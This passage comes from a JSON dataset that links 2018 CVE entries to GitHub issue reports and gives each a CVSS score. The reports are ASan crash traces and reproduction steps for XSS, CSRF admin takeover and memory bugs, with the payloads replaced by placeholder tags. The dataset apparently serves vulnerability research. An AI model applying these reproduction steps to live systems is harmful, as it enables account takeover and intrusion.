  21847. "Issue_Created_At": "2018-07-05T09:10:11Z",
  21848. "description": "XSS Vulnerability caused by Redactor NUMBERTAG The stored XSS can be triggered once you edit content using the Redactor NUMBERTAG URLTAG plugin. It can be found in both the PAGE and BLOG modules. FILETAG To the developer: please avoid using Redactor until they fix this issue. Reference: URLTAG URLTAG",
  21849. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21850. "severity": "MEDIUM",
  21851. "baseScore": 6.1,
  21852. "impactScore": 2.7,
  21853. "exploitabilityScore": 2.8
  21854. },
  21855. {
  21856. "CVE_ID": "CVE-2018-13340",
  21857. "Issue_Url_old": "https://github.com/gleez/cms/issues/795",
  21858. "Issue_Url_new": "https://github.com/gleez/cms/issues/795",
  21859. "Repo_new": "gleez/cms",
  21860. "Issue_Created_At": "2018-07-05T08:47:04Z",
  21861. "description": "CSRF Vulnerability Discovered. Description: CSRF APITAG site request forgery) Vulnerability discovered in Gleez CMS NUMBERTAG while I was penetration testing a couple of vulnerabilities on the demo website: FILETAG POC NUMBERTAG Log in as a user or admin NUMBERTAG Add a new page or blog FILETAG NUMBERTAG Intercept the POST request when a normal user or admin submits a new page or blog, FILETAG NUMBERTAG Launch a CSRF attack FILETAG Exec code: FILETAG NUMBERTAG Proof of attack succeeded! FILETAG FILETAG",
  21862. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21863. "severity": "HIGH",
  21864. "baseScore": 8.8,
  21865. "impactScore": 5.9,
  21866. "exploitabilityScore": 2.8
  21867. },
  21868. {
  21869. "CVE_ID": "CVE-2018-13421",
  21870. "Issue_Url_old": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
  21871. "Issue_Url_new": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
  21872. "Repo_new": "ben-strasser/fast-cpp-csv-parser",
  21873. "Issue_Created_At": "2018-07-06T08:28:54Z",
  21874. "description": "Heap buffer overflow in APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ffff NUMBERTAG ff7ff at pc NUMBERTAG fd4 bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff NUMBERTAG ff7ff thread T NUMBERTAG fd3 in io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) PATHTAG NUMBERTAG fd3 in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG io::no_quote_escape APITAG >(char , std::vector<int, std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const , unsigned int) PATHTAG NUMBERTAG in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG const , char const , char const >(unsigned int, char const , char const , char const ) PATHTAG NUMBERTAG f7 in main PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ffff NUMBERTAG ff7ff is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG ea NUMBERTAG in APITAG APITAG >) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG const ) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG &>(char &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) Shadow bytes around the buggy address NUMBERTAG e0d7ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The test driver and the input case is displayed at : FILETAG URLTAG",
  21875. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21876. "severity": "CRITICAL",
  21877. "baseScore": 9.8,
  21878. "impactScore": 5.9,
  21879. "exploitabilityScore": 3.9
  21880. },
  21881. {
  21882. "CVE_ID": "CVE-2018-13433",
  21883. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/2184",
  21884. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/2184",
  21885. "Repo_new": "boostio/boostnote-legacy",
  21886. "Issue_Created_At": "2018-07-05T15:30:40Z",
  21887. "description": "Another trigger position of XSS. I'm using the latest version ( PATHTAG NUMBERTAG new notes, select Markdown, write payload: APITAG It's not going to trigger now NUMBERTAG when I need to highlight the markdown code, I write it before the code. \" ` \" I trigger XSS when I enter the third one. FILETAG FILETAG Boostnote is great!",
  21888. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21889. "severity": "MEDIUM",
  21890. "baseScore": 6.1,
  21891. "impactScore": 2.7,
  21892. "exploitabilityScore": 2.8
  21893. },
  21894. {
  21895. "CVE_ID": "CVE-2018-13440",
  21896. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/49",
  21897. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/49",
  21898. "Repo_new": "mpruett/audiofile",
  21899. "Issue_Created_At": "2018-07-06T15:21:53Z",
  21900. "description": "NULL pointer dereference in APITAG in APITAG There exists one NULL pointer dereference bug in APITAG in APITAG which allows an attacker to cause a denial of service via a crafted caf file. FILETAG To reproduce with the attached poc file: ./sfconvert $poc output format aiff APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ff NUMBERTAG b NUMBERTAG f bp NUMBERTAG ffd2fd4dd NUMBERTAG sp NUMBERTAG ffd2fd4d9c0 T NUMBERTAG ff NUMBERTAG b NUMBERTAG e in APITAG , Track ) PATHTAG NUMBERTAG ff NUMBERTAG abd in APITAG PATHTAG NUMBERTAG ec NUMBERTAG in copyaudiodata PATHTAG NUMBERTAG ebbe4 in main PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG , Track NUMBERTAG ABORTING",
  21901. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21902. "severity": "MEDIUM",
  21903. "baseScore": 6.5,
  21904. "impactScore": 3.6,
  21905. "exploitabilityScore": 2.8
  21906. },
  21907. {
  21908. "CVE_ID": "CVE-2018-13443",
  21909. "Issue_Url_old": "https://github.com/EOSIO/eos/issues/6585",
  21910. "Issue_Url_new": "https://github.com/eosio/eos/issues/6585",
  21911. "Repo_new": "eosio/eos",
  21912. "Issue_Created_At": "2019-01-11T09:03:58Z",
  21913. "description": "A heap buffer overflow vulnerability of wasm. This bug is already reported at hackerone and has been solved It's just public here. Summary: A heap overflow in the jit wasm which could lead to code execution. In function APITAG when adding the pointer APITAG there is no boundary check. Description: it seems that the bug happens at the WAST::lex CODETAG when realloc the APITAG ERRORTAG because oldsize >= av >system_mem\uff0cit will trigger the error APITAG invalid old size\" but why it will trigger this error, let's find when the APITAG is malloced. I wrote a gdb script to test it, and found that at ERRORTAG APITAG is not limited, and when trying to APITAG it can access the chunk next to it which is APITAG it will overwrite the metadata of APITAG so we will have a heap overflow here...",
  21914. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21915. "severity": "HIGH",
  21916. "baseScore": 8.8,
  21917. "impactScore": 5.9,
  21918. "exploitabilityScore": 2.8
  21919. },
  21920. {
  21921. "CVE_ID": "CVE-2018-13794",
  21922. "Issue_Url_old": "https://github.com/posva/catimg/issues/34",
  21923. "Issue_Url_new": "https://github.com/posva/catimg/issues/34",
  21924. "Repo_new": "posva/catimg",
  21925. "Issue_Created_At": "2018-07-09T07:59:54Z",
  21926. "description": "buffer overflow while cating. I found a heap buffer overflow when cat an image: FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG b5 bp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG b4 in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG fcf in stbi__xload_main PATHTAG NUMBERTAG a NUMBERTAG in stbi_xload PATHTAG NUMBERTAG b0c7 in img_load_from_file PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG daee0 in malloc ( PATHTAG NUMBERTAG in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG ff NUMBERTAG unknown module>) SUMMARY: APITAG heap buffer overflow PATHTAG in stbi__bmp_load_cont Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  21927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21928. "severity": "CRITICAL",
  21929. "baseScore": 9.8,
  21930. "impactScore": 5.9,
  21931. "exploitabilityScore": 3.9
  21932. },
  21933. {
  21934. "CVE_ID": "CVE-2018-13795",
  21935. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/237",
  21936. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/237",
  21937. "Repo_new": "marcobambini/gravity",
  21938. "Issue_Created_At": "2018-07-08T10:09:21Z",
  21939. "description": "Unlimited recursive depth. This will cause an endless loop: func f(a) { APITAG return f(a NUMBERTAG func APITAG { return f NUMBERTAG I think there should be a recursive depth limit (such as NUMBERTAG",
  21940. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21941. "severity": "HIGH",
  21942. "baseScore": 7.5,
  21943. "impactScore": 3.6,
  21944. "exploitabilityScore": 3.9
  21945. },
  21946. {
  21947. "CVE_ID": "CVE-2018-13818",
  21948. "Issue_Url_old": "https://github.com/twigphp/Twig/issues/2743",
  21949. "Issue_Url_new": "https://github.com/twigphp/twig/issues/2743",
  21950. "Repo_new": "twigphp/twig",
  21951. "Issue_Created_At": "2018-09-05T16:38:49Z",
  21952. "description": "CVETAG . Hello. I couldn't find which change fixed CVETAG . Please help.",
  21953. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21954. "severity": "CRITICAL",
  21955. "baseScore": 9.8,
  21956. "impactScore": 5.9,
  21957. "exploitabilityScore": 3.9
  21958. },
  21959. {
  21960. "CVE_ID": "CVE-2018-13833",
  21961. "Issue_Url_old": "https://github.com/dariomanesku/cmft/issues/38",
  21962. "Issue_Url_new": "https://github.com/dariomanesku/cmft/issues/38",
  21963. "Repo_new": "dariomanesku/cmft",
  21964. "Issue_Created_At": "2018-07-09T06:19:41Z",
  21965. "description": "Stack buffer overflow in function APITAG Hi,all. I use Clang NUMBERTAG and APITAG to build cmft , this FILETAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG This is the debug information: CODETAG",
  21966. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21967. "severity": "HIGH",
  21968. "baseScore": 7.8,
  21969. "impactScore": 5.9,
  21970. "exploitabilityScore": 1.8
  21971. },
  21972. {
  21973. "CVE_ID": "CVE-2018-13843",
  21974. "Issue_Url_old": "https://github.com/samtools/htslib/issues/731",
  21975. "Issue_Url_new": "https://github.com/samtools/htslib/issues/731",
  21976. "Repo_new": "samtools/htslib",
  21977. "Issue_Created_At": "2018-07-10T01:38:20Z",
  21978. "description": "A memory leak detected.. Sorry for that I didn't reply in my last issue immediately because I had some other stuff to handle then. Well, it seems that you have found the SEGV signal and fixed it. I found another problem here, it is a memory leak issue. The program I ran is test_bgzf in the test directory, the input file is APITAG in the same directory. The command line is ./test_bgzf FILETAG ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG f in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG d in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) '''",
  21979. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21980. "severity": "HIGH",
  21981. "baseScore": 7.5,
  21982. "impactScore": 3.6,
  21983. "exploitabilityScore": 3.9
  21984. },
  21985. {
  21986. "CVE_ID": "CVE-2018-13846",
  21987. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/282",
  21988. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/282",
  21989. "Repo_new": "axiomatic-systems/bento4",
  21990. "Issue_Created_At": "2018-07-09T07:30:42Z",
  21991. "description": "A heap buffer overflow issue found. A heap buffer overflow problem has been found at APITAG ` APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG fffaeec NUMBERTAG sp NUMBERTAG fffaeec NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG fb in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fb NUMBERTAG c2db6b2 in operator APITAG long) ( PATHTAG NUMBERTAG a NUMBERTAG a in APITAG int) PATHTAG NUMBERTAG a NUMBERTAG e8 in APITAG int) PATHTAG NUMBERTAG e in APITAG unsigned int, unsigned int) PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG de2c in APITAG int, APITAG APITAG PATHTAG NUMBERTAG c8a in APITAG APITAG PATHTAG NUMBERTAG ab in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG APITAG APITAG , bool, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9da0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fd fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ''' The testing program is mp NUMBERTAG ts. And the input file has been put at: URLTAG",
  21992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21993. "severity": "CRITICAL",
  21994. "baseScore": 9.8,
  21995. "impactScore": 5.9,
  21996. "exploitabilityScore": 3.9
  21997. },
  21998. {
  21999. "CVE_ID": "CVE-2018-13847",
  22000. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/283",
  22001. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/283",
  22002. "Repo_new": "axiomatic-systems/bento4",
  22003. "Issue_Created_At": "2018-07-09T08:01:09Z",
  22004. "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  22005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22006. "severity": "HIGH",
  22007. "baseScore": 7.5,
  22008. "impactScore": 3.6,
  22009. "exploitabilityScore": 3.9
  22010. },
  22011. {
  22012. "CVE_ID": "CVE-2018-13865",
  22013. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/27",
  22014. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/27",
  22015. "Repo_new": "idreamsoft/iCMS",
  22016. "Issue_Created_At": "2018-07-10T03:57:23Z",
  22017. "description": "iCMS NUMBERTAG XSS and iWAF bypass. APITAG This reflected XSS does not need to log APITAG only filters XSS like APITAG APITAG",
  22018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22019. "severity": "MEDIUM",
  22020. "baseScore": 6.1,
  22021. "impactScore": 2.7,
  22022. "exploitabilityScore": 2.8
  22023. },
  22024. {
  22025. "CVE_ID": "CVE-2018-13879",
  22026. "Issue_Url_old": "https://github.com/RocketChat/Rocket.Chat/issues/10795",
  22027. "Issue_Url_new": "https://github.com/rocketchat/rocket.chat/issues/10795",
  22028. "Repo_new": "rocketchat/rocket.chat",
  22029. "Issue_Created_At": "2018-05-17T11:11:36Z",
  22030. "description": "One persistent and one reflected XSS. Hey guys, I already created a PR for the persistent XSS URLTAG There is another one which is not as critical. When you create an account, the next step will ask for a username. This field will not save HTML control characters but you will receive an error which shows the attempted username unescaped. Nothing critical but it is there.",
  22031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  22032. "severity": "MEDIUM",
  22033. "baseScore": 5.4,
  22034. "impactScore": 2.7,
  22035. "exploitabilityScore": 2.3
  22036. },
  22037. {
  22038. "CVE_ID": "CVE-2018-13996",
  22039. "Issue_Url_old": "https://github.com/codeplea/genann/issues/24",
  22040. "Issue_Url_new": "https://github.com/codeplea/genann/issues/24",
  22041. "Repo_new": "codeplea/genann",
  22042. "Issue_Created_At": "2018-07-12T07:17:05Z",
  22043. "description": "A stack buffer overflow has been found.. A stack buffer overflow has been found in APITAG ERRORTAG The program I ran was example1, but I have made some changes in that file. The example1 I wrote has been placed at : FILETAG The input file has been put here: URLTAG",
  22044. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22045. "severity": "CRITICAL",
  22046. "baseScore": 9.8,
  22047. "impactScore": 5.9,
  22048. "exploitabilityScore": 3.9
  22049. },
  22050. {
  22051. "CVE_ID": "CVE-2018-13998",
  22052. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/491",
  22053. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/491",
  22054. "Repo_new": "clippercms/clippercms",
  22055. "Issue_Created_At": "2018-07-11T07:49:26Z",
  22056. "description": "Another stored XSS in Full name field of APITAG NUMBERTAG Hello I still found some Stored XSS even though many XSS issues were reported in this CMS. They are in the Full Name field of a user under the Security > Manager Users tab and Security > Web Users, which allows an authenticated attacker (who has the user management role) to inject/store a malicious script inside the Full name field. The script will be executed once the Manager Users or Web Users page is accessed. Steps to reproduce stored XSS NUMBERTAG Go to Security > Manager Users or Security > Web Users tab NUMBERTAG Add a new user or edit an existing user NUMBERTAG In the Full name field, input the XSS payload and save NUMBERTAG Visit Security > Manager Users or Web Users, the payload will be executed Impact: after a successful exploit, the user's cookies can be stolen and CSRF validation APITAG header in this CMS) can also be bypassed. That can also lead to admin account takeover. Authenticated XSS might not be a serious issue, but letting a malicious script execute in the admin's browser is not a good thing either. Screenshots: FILETAG FILETAG FILETAG",
  22057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  22058. "severity": "MEDIUM",
  22059. "baseScore": 4.8,
  22060. "impactScore": 2.7,
  22061. "exploitabilityScore": 1.7
  22062. },
  22063. {
  22064. "CVE_ID": "CVE-2018-13999",
  22065. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/2",
  22066. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/2",
  22067. "Repo_new": "xwlrbh/catfish",
  22068. "Issue_Created_At": "2018-07-11T09:58:24Z",
  22069. "description": "I found a stored XSS vulnerability in articles. An administrator in the website backend can post an article containing stored XSS vulnerabilities: FILETAG Browsing the article can trigger the XSS APITAG FILETAG",
  22070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  22071. "severity": "MEDIUM",
  22072. "baseScore": 4.8,
  22073. "impactScore": 2.7,
  22074. "exploitabilityScore": 1.7
  22075. },
  22076. {
  22077. "CVE_ID": "CVE-2018-14009",
  22078. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1078",
  22079. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1078",
  22080. "Repo_new": "codiad/codiad",
  22081. "Issue_Created_At": "2018-06-21T07:59:19Z",
  22082. "description": "Active maintained / developed?. No commit since NUMBERTAG months? Is the project active maintained / developed?",
  22083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22084. "severity": "CRITICAL",
  22085. "baseScore": 9.8,
  22086. "impactScore": 5.9,
  22087. "exploitabilityScore": 3.9
  22088. },
  22089. {
  22090. "CVE_ID": "CVE-2018-14014",
  22091. "Issue_Url_old": "https://github.com/caokang/waimai/issues/2",
  22092. "Issue_Url_new": "https://github.com/caokang/waimai/issues/2",
  22093. "Repo_new": "caokang/waimai",
  22094. "Issue_Created_At": "2018-07-12T13:58:40Z",
  22095. "description": "There is a CSRF vulnerability that can add an administrator account. After the administrator has logged in, open the following PoC page\uff1a FILETAG //add an admin CODETAG",
  22096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22097. "severity": "HIGH",
  22098. "baseScore": 8.8,
  22099. "impactScore": 5.9,
  22100. "exploitabilityScore": 2.8
  22101. },
  22102. {
  22103. "CVE_ID": "CVE-2018-14016",
  22104. "Issue_Url_old": "https://github.com/radare/radare2/issues/10464",
  22105. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10464",
  22106. "Repo_new": "radareorg/radare2",
  22107. "Issue_Created_At": "2018-06-24T11:30:52Z",
  22108. "description": "null pointer error/heap buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mini Dump crash report | Architecture/bits of the file (mandatory NUMBERTAG etc. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a mini dump crash report binary quickly Actual behavior r2 leads to the null pointer error/heap buffer overflow Steps to reproduce the behavior Download FILETAG or FILETAG run r2 A Q $POC The Address Sanitizer output APITAG $POC1: ERRORTAG $POC2 ERRORTAG",
  22109. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22110. "severity": "MEDIUM",
  22111. "baseScore": 5.5,
  22112. "impactScore": 3.6,
  22113. "exploitabilityScore": 1.8
  22114. },
  22115. {
  22116. "CVE_ID": "CVE-2018-14029",
  22117. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/153",
  22118. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/153",
  22119. "Repo_new": "creatiwity/witycms",
  22120. "Issue_Created_At": "2018-07-11T17:36:21Z",
  22121. "description": "CSRF on PATHTAG page lead to full account take over . Hello, I came across this CMS and tried to find bugs in it. I see that the user edit page is vulnerable to a CSRF attack because there is no CSRF token to validate the user's request. It means that if an admin user visits a crafted url made by an attacker (via XSS or Phishing), a POST request will be generated and submitted to PATHTAG that will change the admin user's information, including password and email address. Once exploited, the attacker can fully take over the admin's account. Affected url: URLTAG Steps to reproduce NUMBERTAG Check the POST request when a user edits information on PATHTAG FILETAG NUMBERTAG Build a CSRF POC based on the POST request from user/edit and store it on the attacker\u2019s site APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG //< FILETAG POST request generated: FILETAG NUMBERTAG After that, the user\u2019s information will be changed to the values the attacker put in the CSRF POC Mitigation: The original password should be required in order to change a user's password URLTAG",
  22122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22123. "severity": "HIGH",
  22124. "baseScore": 8.8,
  22125. "impactScore": 5.9,
  22126. "exploitabilityScore": 2.8
  22127. },
  22128. {
  22129. "CVE_ID": "CVE-2018-14040",
  22130. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26625",
